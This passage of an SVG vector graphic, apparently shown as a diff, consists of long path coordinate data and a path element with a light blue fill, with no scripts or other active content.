1078.8691,55.597153 1078.5648,55.104785 C 1077.8399,53.931972 1081.1634,52.661232 1081.9201,53.821888 C 1082.239,54.311183 1084.1717,55.018854 1086.2149,55.39449 C 1092.9992,56.641761 1091.6423,58.118161 1084.0045,57.799417 C 1080.0585,57.634737 1076.6166,57.1625 1076.3559,56.75 z M 184.56791,52.818 C 182.77689,51.778677 181.66916,51.584389 175.09501,51.156524 C 172.75452,51.004198 172.73857,50.946362 174.5,49 C 175.49549,47.9 177.02773,46.964474 177.90499,46.921053 C 178.81882,46.875821 178.99807,46.637333 178.3247,46.362619 C 177.67829,46.098902 175.33371,46.809429 173.11454,47.941567 C 168.25419,50.421134 166.85754,50.534814 167.68302,48.383666 C 168.18648,47.071669 167.94521,46.947602 166.40163,47.724744 C 165.35573,48.251321 162.33903,48.580203 159.69785,48.455594 C 154.82507,48.2257 152.56979,47.351599 155.10687,46.676227 C 155.87309,46.472259 159.65,45.361082 163.5,44.206945 C 170.39253,42.140729 175.23807,41.665614 179.83825,42.604946 C 181.75866,42.997082 181.96015,43.343088 180.96581,44.541201 C 180.18716,45.479418 180.1346,46 180.81854,46 C 181.40342,46 182.16008,45.55 182.5,45 C 183.27484,43.746283 188,43.67469 188,44.916667 C 188,45.420833 187.6625,46.022081 187.25,46.252772 C 186.8375,46.483463 187.12956,46.509354 187.89902,46.310307 C 188.66847,46.11126 191.21479,46.680421 193.5575,47.575109 C 196.73471,48.788498 198.28486,48.92982 199.65848,48.131315 C 201.41079,47.112677 201.40311,47.058241 199.5,47.007639 C 197.97044,46.966968 198.25477,46.582299 200.70883,45.372266 C 203.74246,43.876461 204.06499,43.905961 206.61596,45.912553 C 208.26269,47.207874 210.05153,47.801032 211.20609,47.434589 C 212.2466,47.104344 214.17731,47.541386 215.49657,48.405794 C 216.81582,49.270201 218.58222,49.713811 219.4219,49.391594 C 220.76817,48.874985 220.75325,48.610397 219.29571,47.152873 C 217.75852,45.615701 217.76349,45.476757 219.36668,45.167957 C 220.31481,44.985333 222.30767,45.256081 223.79527,45.769619 C 225.50132,46.358566 228.73504,46.330587 232.55313,45.693842 C 235.88235,45.138627 239.77021,44.976495 241.19283,45.333548 C 244.2112,46.091111 245.52425,48.66339 243.89481,50.626748 C 242.42921,52.392687 233.1267,52.492927 232.45677,50.75 C 232.16791,49.998511 230.00733,49.471301 227.03917,49.428039 C 224.32374,49.38846 222.31142,49.694866 222.56733,50.10894 C 223.42427,51.495494 221.19438,52.0244 218.61932,51.045365 C 217.14369,50.484332 215.83871,50.45196 215.51949,50.968468 C 215.21626,51.459094 211.93783,51.876046 208.23409,51.895027 C 204.53034,51.914009 199.07608,52.395393 196.11351,52.964769 C 189.36013,54.262702 187.00594,54.232776 184.56791,52.818 z M 248.62367,52.166018 C 245.76779,51.616064 247.40625,49.524219 250.96538,49.176321 C 255.55356,48.727837 259,49.749932 259,51.559109 C 259,52.730533 258.00688,53.013449 254.679,52.790057 C 252.30246,52.630526 249.57755,52.349708 248.62367,52.166018 z M 1068.1566,51.591381 C 1065.9379,50.396801 1065.905,50.237882 1067.5379,48.60499 C 1069.049,47.093845 1070.7307,46.953142 1081.1208,47.468505 C 1087.6428,47.792006 1093.9796,48.426816 1095.2025,48.879193 C 1097.3872,49.687376 1097.3911,49.720325 1095.4267,50.771622 C 1092.2691,52.461556 1070.9624,53.10205 1068.1566,51.591381 z M 1102.2144,51.923125 C 1097.8091,50.583987 1098.9685,49.158859 1104.2438,49.428512 C 1106.5847,49.548168 1110.525,49.739387 1113,49.853443 C 1116.4697,50.013336 1117.1159,50.284927 1115.8223,51.039626 C 1113.2284,52.55301 1105.8602,53.031391 1102.2144,51.923125 z M 519,51.122445 C 519,49.195437 521.51824,48.335361 523.74407,49.50216 C 524.97831,50.149157 525.69081,50.975852 525.32741,51.339259 C 524.34445,52.322215 519,52.139082 519,51.122445 z M 1062,49 C 1062,47.706093 1063.7003,47.706093 1064.5,49 C 1064.8399,49.55 1064.4165,50 1063.559,50 C 1062.7016,50 1062,49.55 1062,49 z M 638.25,44.02693 C 635.9125,42.9659 634,41.68846 634,41.188175 C 634,40.68789 632.42839,40.403266 630.50753,40.555677 C 628.13705,40.743763 626.28982,40.190242 624.75753,38.832691 C 622.68723,36.99847 622.66587,36.881206 624.5,37.418751 C 626.40308,37.976502 626.41185,37.936425 624.68098,36.591746 C 622.93097,35.232186 622.93566,35.155195 624.80488,34.56193 C 625.87347,34.22277 629.84203,33.953254 633.62389,33.963006 C 637.40575,33.972758 642.3,33.767168 644.5,33.50614 C 648.65415,33.013254 663.71012,31.954706 667.90054,31.860906 C 672.17819,31.765154 680.9546,33.117529 681.47027,33.951894 C 682.26478,35.237439 674.9068,36.711647 668.63099,36.524308 C 665.4788,36.430212 662.69841,36.678959 662.45236,37.07708 C 662.20631,37.4752 664.30147,38.626736 667.10827,39.636048 L 672.21155,41.47116 L 669.35577,42.627055 C 667.56162,43.353249 665.01301,43.494297 662.5,43.006473 C 660.3,42.579412 658.95,42.163937 659.5,42.083196 C 660.05,42.002454 659.67594,41.31186 658.66875,40.548541 C 657.28407,39.499137 656.12572,39.408816 653.91875,40.178169 C 652.31344,40.737784 651,41.601629 651,42.097825 C 651,42.594021 650.14814,43 649.10699,43 C 648.06583,43 646.95496,43.675 646.63837,44.5 C 645.871,46.499731 643.38937,46.359777 638.25,44.02693 z M 188.2197,42.561559 C 180.69558,40.725066 180.64291,39.923171 188.081,40.44989 C 192.34493,40.751835 193.32493,40.653907 191,40.158205 C 187.58726,39.430571 187.6431,39.392602 193.23967,38.635317 C 196.39649,38.20816 199.923,38.158174 201.07637,38.524238 C 203.14106,39.179545 203.14378,39.217393 201.253,40.978921 C 198.51172,43.532816 194.29618,44.04471 188.2197,42.561559 z M 214.88029,42.355754 C 213.6589,40.884079 213.77725,40.790921 216.00784,41.468149 C 219.51883,42.534115 220.85894,44 218.32244,44 C 217.17979,44 215.63082,43.260089 214.88029,42.355754 z M 245.77055,42.006027 C 242.64392,41.064333 239.58952,38.371722 240.79959,37.623859 C 242.21924,36.746468 253.39002,38.670059 253.78674,39.860225 C 253.9957,40.487101 255.28072,41 256.64235,41 C 258.03816,41 258.84845,41.436191 258.5,42 C 257.77132,43.179036 249.67793,43.182868 245.77055,42.006027 z M 228,41 C 229.85794,40.404983 228.89485,40.17376 224.25,40.09968 C 220.8125,40.044856 218,39.55 218,39 C 218,38.45 217.325,38 216.5,38 C 215.675,38 215,37.607514 215,37.127808 C 215,35.720433 222.8705,34.860326 225.05428,36.029051 C 226.14716,36.613942 227.45895,36.834387 227.96937,36.51893 C 229.33139,35.677154 238.07091,38.076252 237.42856,39.115588 C 237.12793,39.602014 237.35852,40 237.94098,40 C 238.52344,40 239,40.45 239,41 C 239,41.577746 236.14979,41.95791 232.25,41.90032 C 227.34947,41.827952 226.18499,41.581268 228,41 z M 935,41.052279 C 935,40.6197 936.87796,39.022998 939.17324,37.504052 C 943.10549,34.901814 943.61078,34.810947 947.92324,35.930516 C 950.44046,36.584017 953.25114,37.122698 954.1692,37.127585 C 955.08725,37.132473 956.08563,37.780765 956.38781,38.568236 C 956.81139,39.672063 955.85646,40.041889 952.21862,40.182888 C 949.62338,40.283477 946.21529,40.275361 944.64508,40.164854 C 943.07488,40.054346 940.26238,40.385773 938.39508,40.901358 C 936.52779,41.416943 935,41.484857 935,41.052279 z M 929.94893,38.615595 C 929.67381,38.340477 927.21025,38.019455 924.47436,37.902212 C 921.73846,37.784969 918.75704,37.317015 917.84899,36.862314 C 916.94093,36.407613 914.09636,35.860511 911.52773,35.646531 C 905.6536,35.157188 903.51545,33.396966 907.60536,32.417468 C 909.19741,32.036184 910.95,31.386661 911.5,30.974084 C 913.58603,29.409263 922.78701,28.865842 927.11408,30.051898 C 930.79509,31.060867 931.17856,31.383089 929.5,32.056756 C 927.5,32.859429 927.5,32.859429 929.5,33.036014 C 930.6,33.133135 932.175,33.312791 933,33.435249 C 933.825,33.557707 935.19107,33.734872 936.03571,33.82895 C 936.88036,33.923027 937.57143,34.9 937.57143,36 C 937.57143,37.125855 936.90021,38.005968 936.03571,38.013655 C 935.19107,38.021165 933.58856,38.272222 932.47457,38.571559 C 931.36059,38.870897 930.22405,38.890713 929.94893,38.615595 z M 234.5,34 C 234.14044,33.418215 235.13661,33 236.88197,33 C 238.53197,33 240.16008,33.45 240.5,34 C 240.85956,34.581785 239.86339,35 238.11803,35 C 236.46803,35 234.83992,34.55 234.5,34 z M 747,32.502028 L 742.5,31.160954 L 746.5,30.918114 C 764.43194,29.829468 772.62584,30.404677 764.5,32.181706 C 757.28242,33.760108 751.57223,33.864628 747,32.502028 z M 770,33 C 768.89475,32.28573 769.55266,32.030626 772.5,32.030626 C 775.44734,32.030626 776.10525,32.28573 775,33 C 774.175,33.533156 773.05,33.969374 772.5,33.969374 C 771.95,33.969374 770.825,33.533156 770,33 z M 781.63837,32.5 C 782.06132,31.397823 781.50691,31 779.54797,31 C 775.57845,31 777.34414,29.351308 781.9795,28.729575 C 787.12262,28.039738 790.02254,28.7777 789.32381,30.598536 C 788.58756,32.517195 793.85976,32.420645 796.44113,30.468197 C 798.56963,28.858283 802.57598,28.504902 803.40949,29.853551 C 803.69996,30.323536 806.4821,30.307994 809.60059,29.818967 C 812.71556,29.330492 815.50473,29.171394 815.79875,29.465415 C 816.94629,30.612961 814.6469,31.473717 809.68617,31.753601 C 806.83378,31.914533 801.125,32.457988 797,32.961279 C 785.16147,34.405697 780.95555,34.279401 781.63837,32.5 z " + id="path2175" /> + <path + style="fill:#71B7F1" + d="M 3.5,589.98392 C 1.0320741,589.36464 1.2460551,589.29486 4.7064918,589.59047 C 7.0200624,589.78811 9.1550353,589.55816 9.4508761,589.07948 C 9.8706167,588.40033 21.557372,586.75379 27.5,586.53656 C 28.05,586.51645 28.886087,585.89064 29.357971,585.14586 C 30.008374,584.11932 32.790563,583.84998 40.857971,584.03255 C 54.332772,584.33748 54.983923,584.28211 53,583 C 51.87625,582.27378 52.377916,582.03348 55,582.042 C 61.670544,582.06367 90.514119,578.86505 93.5,577.77252 C 95.15,577.16879 98.75,576.55931 101.5,576.41812 C 125.10454,575.20624 142.07015,573.31075 144.88532,571.57088 C 145.56247,571.15237 149.80279,571.28724 154.30825,571.87058 C 158.81371,572.45392 170.5568,573.17409 180.40399,573.47095 C 190.25119,573.76782 198.84927,574.45994 199.51083,575.00899 C 200.81266,576.08941 207,575.24093 207,573.98199 C 207,573.1683 204.5309,572 202.81122,572 C 202.24736,572 202.04504,572.675 202.36163,573.5 C 202.67821,574.325 202.50135,575 201.96862,575 C 200.46242,575 200.82931,572.00273 202.40974,571.39626 C 203.1851,571.09873 205.18775,571.56285 206.86008,572.42765 C 208.53241,573.29244 211.22159,574 212.83603,574 C 214.45048,574 217.06032,574.67223 218.63569,575.49384 C 220.21106,576.31545 223.48135,576.99045 225.90301,576.99384 C 230.29015,576.99998 230.29833,576.99333 228.1712,575.14848 C 226.99705,574.13014 226.32819,573.00514 226.68485,572.64848 C 227.04152,572.29182 226.38489,572 225.22568,572 C 224.06648,572 222.89179,571.63392 222.61526,571.1865 C 222.02461,570.23081 231.65009,571.31675 232.6522,572.31886 C 233.02682,572.69349 232.24583,573.01431 230.91667,573.0318 C 228.68677,573.06115 228.6361,573.1669 230.26109,574.40015 C 231.83246,575.59272 231.85709,575.87372 230.48967,577.00857 C 229.42414,577.89289 227.15848,578.09244 223.05417,577.66345 C 218.82507,577.22142 217.02678,577.39433 216.71249,578.27323 C 216.47122,578.94795 215.92308,579.17337 215.4944,578.77417 C 215.06573,578.37496 215.28422,577.36246 215.97994,576.52417 C 217.07846,575.20053 216.70251,575 213.12244,575 C 210.8551,575 209,575.45 209,576 C 209,577.30277 200.70233,577.30233 199.39949,575.99949 C 198.84796,575.44796 190.11986,574.75044 179.94949,574.44513 C 169.80227,574.14051 158.24301,573.43578 154.26224,572.87906 C 150.28147,572.32234 146.60378,572.12685 146.08958,572.44464 C 143.10371,574.29001 115.4117,577.28759 102.52461,577.16042 C 99.788152,577.13342 97.26657,577.56868 96.921098,578.12767 C 96.336175,579.07409 91.717906,579.72365 70,581.91414 C 65.325,582.38566 59.475,583.35635 57,584.07124 C 54.195799,584.8812 48.398623,585.26605 41.616517,585.09247 C 33.383241,584.88175 30.532229,585.13884 29.908395,586.14822 C 29.454843,586.88208 28.502411,587.50183 27.791878,587.52545 C 21.692603,587.72815 9.8781719,589.38811 9.4353672,590.10458 C 8.8191799,591.10159 7.8778089,591.08245 3.5,589.98392 z M 1216.3916,589.0028 C 1211.9319,588.61242 1207.8677,588.03627 1207.36,587.72247 C 1205.5756,586.61969 1173.157,585.93693 1172.5071,586.98844 C 1171.5659,588.51135 1163.891,588.19158 1160.6357,586.49384 C 1159.0603,585.67223 1157.0927,585 1156.2632,585 C 1155.0361,585 1154.987,584.72056 1156,583.5 C 1156.9411,582.3661 1156.9535,582 1156.051,582 C 1155.2619,582 1155.3657,581.49145 1156.3571,580.5 C 1157.1821,579.675 1158.2608,579 1158.7543,579 C 1159.2477,579 1160.6863,577.89834 1161.9513,576.55187 C 1163.2162,575.2054 1165.6572,573.80344 1167.3756,573.4364 C 1169.094,573.06936 1171.0584,572.31934 1171.7408,571.76968 C 1172.4233,571.22003 1174.3358,570.96906 1175.9908,571.21196 C 1177.6459,571.45487 1179,571.28155 1179,570.82681 C 1179,570.37206 1179.675,570 1180.5,570 C 1181.325,570 1182,569.325 1182,568.5 C 1182,567.675 1182.45,567 1183,567 C 1184.7716,567 1184.0032,569.45264 1181.7186,571.09008 C 1180.4984,571.96462 1177.8964,572.73526 1175.9365,572.80262 C 1171.9021,572.94126 1166.6531,575.29878 1167.7651,576.47269 C 1168.1693,576.89936 1167.6,576.97783 1166.5,576.64706 C 1165.4,576.31629 1163.825,576.47849 1163,577.00752 C 1161.7192,577.82879 1161.7558,577.97161 1163.25,577.98469 C 1164.2125,577.99311 1165,578.45 1165,579 C 1165,579.55 1163.6766,580 1162.059,580 C 1156.304,580 1157.1026,584.35126 1163.1925,586.17582 C 1166.3104,587.10997 1167.6061,587.10261 1169.1443,586.14198 C 1171.5073,584.66627 1203.102,585.45761 1209.5,587.15276 C 1211.7,587.73565 1224.075,588.5428 1237,588.94641 L 1260.5,589.68025 L 1242.5,589.69642 C 1232.6,589.70531 1220.8512,589.39319 1216.3916,589.0028 z M 406.5,585.59691 C 396.05,583.77877 385.025,581.58111 382,580.71322 C 378.975,579.84534 374.5875,578.84027 372.25,578.47973 C 369.9125,578.11919 368,577.41376 368,576.9121 C 368,575.75545 369.5318,575.74626 371.76357,576.8895 C 374.94774,578.52063 395.30295,582.85034 412.2743,585.50644 C 426.29719,587.7011 429.90574,587.95705 434.2743,587.06687 C 437.77648,586.35323 442.90564,586.30423 449.82588,586.91829 C 458.13757,587.65582 460.82458,587.55342 463.60106,586.39333 C 465.49819,585.60066 469.17654,584.72714 471.77519,584.45217 C 478.96421,583.69148 491.45911,580.85911 491.82278,579.90773 C 492.00031,579.4433 493.80031,578.76707 495.82278,578.405 C 497.84525,578.04292 500.24729,577.09532 501.16066,576.29921 C 502.07402,575.5031 505.25292,574.52176 508.22488,574.11846 C 511.71442,573.64492 514.88379,572.42768 517.17245,570.68204 C 519.62468,568.81163 521.76131,568.03605 524.10822,568.16442 C 528.2281,568.38976 539.32898,566.22981 543.65113,564.36186 C 545.38425,563.61284 547.72019,563 548.84211,563 C 549.96403,563 551.11275,562.62658 551.39482,562.17018 C 551.67689,561.71379 556.54095,561.26422 562.20384,561.17114 C 573.06302,560.99266 582.66987,559.06214 582.25,557.14282 C 581.85285,555.32733 586.1465,555.81826 587.56035,557.75 C 588.70919,559.31966 590.98766,559.5 609.67059,559.5 C 624.27249,559.5 631.24744,559.12812 633,558.25616 C 635.86237,556.83203 641,556.57847 641,557.86133 C 641,558.33506 642.0125,558.55601 643.25,558.35233 C 644.4875,558.14865 651.575,558.56677 659,559.28147 C 669.96624,560.33705 673.89561,560.34235 679.9359,559.3097 C 684.02564,558.61052 687.58423,558.2509 687.84389,558.51055 C 688.10354,558.77021 688.80739,558.57682 689.40799,558.08081 C 691.23718,556.57017 698,555.63186 698,556.88871 C 698,557.49992 698.9,558 700,558 C 701.1,558 702,557.37748 702,556.61663 C 702,555.11235 706.09253,553.61816 706.96422,554.80418 C 707.61281,555.68665 716.2752,558 718.93102,558 C 719.97729,558 720.99612,558.48835 721.19508,559.08523 C 721.39403,559.6821 722.66903,559.0654 724.02841,557.71477 C 725.83529,555.91952 728.786,554.80737 735,553.57948 C 739.675,552.6557 745.00065,551.42948 746.83478,550.85456 C 748.66891,550.27963 751.81891,550.09385 753.83478,550.44171 C 756.12918,550.83765 757.00113,550.73836 756.16615,550.17626 C 755.0869,549.44971 755.13461,549.16232 756.41615,548.67055 C 757.28727,548.33627 758.69662,548.33009 759.54804,548.65681 C 760.44615,549.00145 761.67128,548.46346 762.46609,547.37543 C 763.63533,545.77483 765.13038,545.5114 772.66805,545.57782 C 781.42908,545.65502 787.01882,546.56892 788.0213,548.088 C 788.30801,548.52247 789.88301,549.13421 791.5213,549.44743 C 796.36985,550.37439 827.9665,551.95008 829.54669,551.34371 C 830.44176,551.00024 831,551.39598 831,552.37396 C 831,553.29655 832.15225,554.20912 833.75,554.55193 C 835.2625,554.87645 838.525,555.75312 841,556.50009 C 845.8731,557.97082 857.60053,557.20628 858.83365,555.33747 C 859.72098,553.99271 865.65044,552.00792 868.89922,551.9682 C 870.32965,551.9507 872.37351,551.2757 873.44113,550.4682 C 875.362,549.01533 875.36201,548.9852 873.4427,547.58176 C 870.58568,545.49265 872.32069,544.6207 876.55439,546.01795 C 879.44158,546.97081 881.86237,546.97396 887.69858,546.03248 C 894.00346,545.0154 895.4126,545.0534 896.82719,546.27868 C 898.08243,547.36594 900.8714,547.66831 908,547.49001 C 918.16081,547.23586 921,546.57237 921,544.45203 C 921,542.04231 923.01115,541.80315 928.047,543.61401 C 932.20355,545.10869 933.55087,545.20258 936.34487,544.19226 C 938.17944,543.52887 941.04778,543.25956 942.71895,543.59379 C 944.50435,543.95087 946.03893,543.74602 946.44001,543.09707 C 947.21023,541.85083 951.4013,542.62206 954.5,544.58026 C 955.6,545.2754 958.64303,546.15614 961.2623,546.53746 C 963.88156,546.91878 966.26013,547.61188 966.54801,548.07768 C 967.02284,548.84598 968.05224,548.56844 974.5,545.93373 C 978.39204,544.34334 983.09389,543.83303 984.33844,544.86592 C 986.3769,546.55769 996.96204,548.22226 1004.5,548.03643 C 1011.4993,547.86388 1014.2699,546.90287 1011.9326,545.45836 C 1011.1322,544.9637 1010.9446,545.10128 1011.4045,545.84549 C 1011.7969,546.48047 1011.6415,547 1011.059,547 C 1010.4766,547 1010,546.57656 1010,546.05902 C 1010,544.61793 1012.1413,543.61765 1012.8618,544.72218 C 1013.2128,545.26031 1014.5697,546.26442 1015.8772,546.95354 C 1017.7511,547.94125 1018.4149,547.94674 1019.0127,546.97946 C 1020.0082,545.36873 1033.2036,546.11072 1033.7698,547.80926 C 1034.3569,549.57067 1042,549.36085 1042,547.58333 C 1042,546.80417 1041.4586,545.98621 1040.7969,545.76565 C 1040.1353,545.54509 1043.7353,545.56263 1048.7969,545.80464 C 1056.9557,546.19471 1058,546.05223 1058,544.549 C 1058,543.45497 1058.6209,542.98914 1059.75,543.23607 C 1060.7125,543.44656 1061.3963,544.12829 1061.2695,544.75103 C 1061.1391,545.39128 1062.8772,546.11105 1065.2695,546.40744 C 1075.6662,547.69557 1084.1547,548.33761 1092.5,548.46705 C 1100.3687,548.58911 1101.4631,548.81993 1101.2062,550.30333 C 1100.9755,551.63499 1101.6747,552 1104.4562,552 C 1106.4053,552 1108,552.34501 1108,552.76669 C 1108,553.18837 1112.6027,553.67751 1118.2282,553.85365 C 1123.8538,554.0298 1129.1413,554.52917 1129.9782,554.96335 C 1130.8152,555.39753 1134.65,556.07421 1138.5,556.46708 C 1142.35,556.85995 1146.85,557.81228 1148.5,558.58337 C 1150.15,559.35446 1152.85,560.06892 1154.5,560.17107 C 1156.15,560.27322 1157.8662,560.54581 1158.3138,560.77684 C 1158.7614,561.00786 1162.1364,561.33695 1165.8138,561.50813 C 1169.4912,561.67932 1174.9218,562.52495 1177.8817,563.38732 C 1180.8416,564.24969 1183.6031,564.74528 1184.0184,564.48864 C 1184.4336,564.232 1185.3869,564.7701 1186.1367,565.68443 C 1187.3599,567.17594 1187.243,567.27053 1185,566.60454 C 1176.4563,564.06777 1165.04,561.92344 1162.3393,562.34818 C 1160.6009,562.62158 1158.8881,562.55478 1158.5331,562.19973 C 1158.178,561.84467 1156.3687,561.45701 1154.5124,561.33826 C 1152.6561,561.2195 1149.8689,560.47636 1148.3186,559.68683 C 1146.7684,558.8973 1142.35,557.92345 1138.5,557.52271 C 1134.65,557.12197 1130.7709,556.40582 1129.8797,555.93127 C 1128.9885,555.45671 1123.0485,554.97366 1116.6797,554.85782 C 1110.3109,554.74197 1105.3086,554.30972 1105.5635,553.89724 C 1105.8184,553.48477 1103.551,552.83793 1100.5248,552.45983 C 1097.4986,552.08174 1095.2691,551.3736 1095.5703,550.88619 C 1095.8716,550.39879 1094.854,549.94197 1093.309,549.87105 C 1091.7641,549.80013 1089.375,549.63596 1088,549.50624 C 1086.625,549.37651 1080.775,548.92095 1075,548.49388 C 1063.8192,547.66706 1059.4952,546.62579 1060.4988,545.00187 C 1060.8394,544.45084 1060.6415,544 1060.059,544 C 1059.4766,544 1059,544.675 1059,545.5 C 1059,546.70833 1057.4444,547 1051,547 C 1044.5556,547 1043,547.29167 1043,548.5 C 1043,550.50981 1035.2268,550.48613 1032.5589,548.4682 C 1030.365,546.80885 1020.5059,546.39144 1021.5,548 C 1021.8596,548.58179 1020.8634,549 1019.118,549 C 1017.468,549 1015.8392,548.54878 1015.4983,547.9973 C 1015.1056,547.3619 1014.2434,547.33457 1013.1445,547.92269 C 1008.9863,550.14805 987.80077,548.7394 984.52367,546.01965 C 983.03068,544.78057 975.9233,545.63909 974.919,547.17982 C 974.59944,547.67005 973.05598,548.30363 971.48907,548.58776 C 969.92216,548.87189 968.30221,549.31323 967.88917,549.5685 C 967.47614,549.82377 966.88764,549.62721 966.58139,549.1317 C 966.27515,548.63619 963.88156,547.91878 961.2623,547.53746 C 958.64303,547.15614 955.49682,546.19995 954.2707,545.41259 C 953.04459,544.62523 951.01959,544.00195 949.7707,544.02752 C 944.64955,544.13239 937.33117,544.86173 934.76353,545.52311 C 933.0446,545.96588 930.52711,545.62782 927.99329,544.61399 C 922.82262,542.5451 922,542.5834 922,544.89301 C 922,547.62717 919.71849,548.2355 908.5,548.4926 C 900.90932,548.66656 898.09287,548.36968 896.8102,547.26038 C 895.38245,546.02561 894.02991,545.98292 888.08826,546.98511 C 884.22058,547.63748 879.72827,547.87959 878.10534,547.52314 C 875.59532,546.97184 875.22288,547.14577 875.61194,548.68752 C 876.13387,550.75584 872.22891,552.99059 868.05064,553.01474 C 866.64779,553.02285 864.375,553.67853 863,554.4718 C 858.16436,557.26162 855.46656,558.17243 852,558.18554 C 850.075,558.19283 847.8186,558.56311 846.98579,559.00839 C 846.07691,559.49433 844.72367,559.27111 843.60076,558.45002 C 842.57181,557.69764 839.7056,556.77848 837.2314,556.40745 C 834.7572,556.03642 831.99872,555.00546 831.10144,554.11643 C 829.82146,552.84819 826.88836,552.43442 817.48502,552.19557 C 799.0016,551.72609 787.15129,550.25662 783.46227,547.97668 C 781.04609,546.4834 778.58094,546.01719 773.38197,546.07029 C 769.59688,546.10894 765.6,546.52731 764.5,547 C 763.4,547.47269 763.0625,547.89106 763.75,547.92971 C 766.30688,548.07348 764.93815,550.71548 762.25,550.8251 C 755.74247,551.09047 748.31743,551.76032 746,552.29109 C 744.625,552.60602 739.57747,553.63654 734.78326,554.58115 C 729.98906,555.52576 726.29127,556.66227 726.56596,557.10672 C 727.27198,558.24909 721.48876,561.06514 720.39876,560.10975 C 719.90444,559.67648 716.8,558.72402 713.5,557.99316 C 710.2,557.2623 706.99721,556.2843 706.38268,555.81983 C 705.14556,554.88479 702.59461,557.26128 703.67534,558.34201 C 704.03724,558.7039 702.93489,559 701.22568,559 C 699.51648,559 697.82364,558.52365 697.46382,557.94145 C 696.7631,556.80766 691.28685,557.59985 689.40799,559.1068 C 688.80739,559.58851 688.0796,559.74626 687.79068,559.45735 C 687.50177,559.16844 685.06818,559.43233 682.38269,560.04377 C 675.93852,561.51101 669.00166,561.5 654.70229,559.99981 C 648.21355,559.31906 642.62996,559.03671 642.2943,559.37237 C 641.95865,559.70802 641.08505,559.48555 640.35297,558.87798 C 638.9489,557.7127 632,558.51029 632,559.83673 C 632,560.24708 627.05416,560.48794 621.00924,560.37196 C 614.96432,560.25598 609.78722,560.53526 609.50459,560.99258 C 609.22195,561.44989 607.75529,561.67188 606.24535,561.48587 C 604.73541,561.29987 600.14774,560.87797 596.05054,560.54832 C 591.2409,560.16135 587.9574,559.36644 586.78464,558.3051 C 585.16706,556.84121 584.83308,556.8273 583.7341,558.17807 C 581.93736,560.38643 572.45587,562.11495 561.53216,562.22557 C 556.28947,562.27866 552,562.69962 552,563.16105 C 552,563.62247 550.85265,564 549.45034,564 C 548.04803,564 545.46053,564.76427 543.70034,565.69838 C 541.94015,566.63248 539.74561,567.2848 538.82357,567.14798 C 537.90154,567.01116 534.59469,567.56575 531.47503,568.38041 C 528.35537,569.19506 525.16418,569.6165 524.3835,569.31692 C 522.80015,568.70933 517,570.81704 517,572 C 517,573.10567 512.13543,574.7673 507.2774,575.32103 C 504.95498,575.58575 502.33533,576.52181 501.45597,577.40117 C 500.57662,578.28053 498.97345,579 497.89339,579 C 496.81332,579 494.93297,579.64245 493.71482,580.42767 C 492.49667,581.21289 488.58134,582.37694 485.01409,583.01445 C 481.44684,583.65196 478.0948,584.44141 477.56511,584.76878 C 477.03541,585.09615 474.48936,585.47083 471.9072,585.60141 C 469.32505,585.73198 465.86506,586.53554 464.21835,587.38709 C 461.72973,588.674 459.51629,588.78699 451.10574,588.05644 C 445.54051,587.57304 439.97754,587.31686 438.74357,587.48717 C 428.17438,588.94587 424.51575,588.73139 406.5,585.59691 z M 1100.25,549.33772 C 1099.5625,549.06031 1098.4375,549.06031 1097.75,549.33772 C 1097.0625,549.61513 1097.625,549.84211 1099,549.84211 C 1100.375,549.84211 1100.9375,549.61513 1100.25,549.33772 z M 371,575.07143 C 371,573.90379 373.854,571 375.00162,571 C 375.95834,571 374.83997,566.43802 373.0746,563.13939 C 371.58737,560.36048 373.14796,557.2998 376.8108,555.81181 L 379.5,554.71935 L 377.00525,554.06583 C 375.63314,553.70639 374.34358,552.53204 374.13957,551.45615 C 373.93556,550.38027 373.25819,549.15336 372.63432,548.72968 C 371.86565,548.20768 372.30587,547.28488 374,545.86695 C 375.375,544.71613 376.5,543.45563 376.5,543.06584 C 376.5,542.67606 377.2875,541.56964 378.25,540.60714 C 379.2125,539.64464 380,539.35341 380,539.95996 C 380,540.5665 379.32758,541.3208 378.50574,541.63617 C 377.6839,541.95154 377.24824,542.59265 377.53761,543.06085 C 377.82698,543.52906 376.90129,544.6738 375.48052,545.60472 C 373.67427,546.78822 373.21352,547.61352 373.94865,548.34865 C 374.52689,548.92689 375,550.21 375,551.2 C 375,552.47303 375.76322,553 377.60699,553 C 379.57338,553 380.06483,553.38868 379.60699,554.58179 C 379.27314,555.45177 379,556.35177 379,556.58179 C 379,556.8118 378.11583,557 377.03518,557 C 374.25653,557 372.61296,560.40829 374.0746,563.13939 C 374.70433,564.31605 375.58899,566.5669 376.04052,568.14127 C 376.71216,570.48314 376.4962,571.19926 374.85318,572.07858 C 373.71435,572.68806 373.08134,573.76959 373.39106,574.57669 C 373.71067,575.4096 373.32804,576 372.46862,576 C 371.66088,576 371,575.58214 371,575.07143 z M 302,570.93618 C 297.325,570.5214 289.49279,570.4359 284.59508,570.74619 C 277.98544,571.16493 275.87459,571.01193 276.40569,570.1526 C 276.93753,569.29207 273.70406,569.07417 263.81061,569.30383 C 256.48977,569.47377 249.38758,569.40336 248.02795,569.14738 C 245.7454,568.71763 245.70707,568.62287 247.52795,567.91126 C 248.66033,567.46872 245.01755,567.11064 238.97251,567.07029 C 231.14343,567.01802 227.89616,567.38443 226.30376,568.49979 C 225.12607,569.32468 223.45352,569.72753 222.58699,569.39501 C 220.40895,568.55921 221.73482,566.78106 224,567.5 C 225.00743,567.81975 226.12111,567.61305 226.47486,567.04068 C 227.45877,565.44868 248.48702,565.67697 249.82921,567.29422 C 250.63551,568.26574 254.28135,568.51235 264.45166,568.2833 C 271.90325,568.11548 278,568.36108 278,568.82908 C 278,569.79111 307.61766,569.51299 313,568.50042 C 315.01239,568.12183 319.25512,568.479 322.98217,569.34075 C 326.83539,570.23167 330.07991,570.49378 330.98217,569.98701 C 332.81894,568.95536 331.7478,568.48579 325.58631,567.62156 C 320.70312,566.93663 319.49016,565.82115 320.85516,563.27063 C 321.90027,561.31784 323.41388,561.1697 327.94645,562.57662 C 330.22192,563.28294 330.25687,563.38924 328.44645,564.09772 C 327.3759,564.51666 325.15,564.92269 323.5,565 C 320.89888,565.12188 320.76592,565.25484 322.5,566 C 323.6,566.47269 326.36436,566.89106 328.64301,566.92971 C 332.52849,566.99563 334,568.11778 334,571.01486 C 334,571.98492 328.46948,571.60107 322.36091,570.20702 C 318.79791,569.39391 316.27707,569.30667 312.69098,569.87238 C 312.24602,569.94257 312.16008,570.45 312.5,571 C 312.83992,571.55 312.52898,571.93033 311.80902,571.84517 C 311.08906,571.76001 306.675,571.35097 302,570.93618 z M 321.75,560.18358 C 316.99218,559.63613 318.76483,558 324.11579,558 C 326.92947,558 331.40847,557.22683 334.06913,556.28185 C 338.84014,554.58734 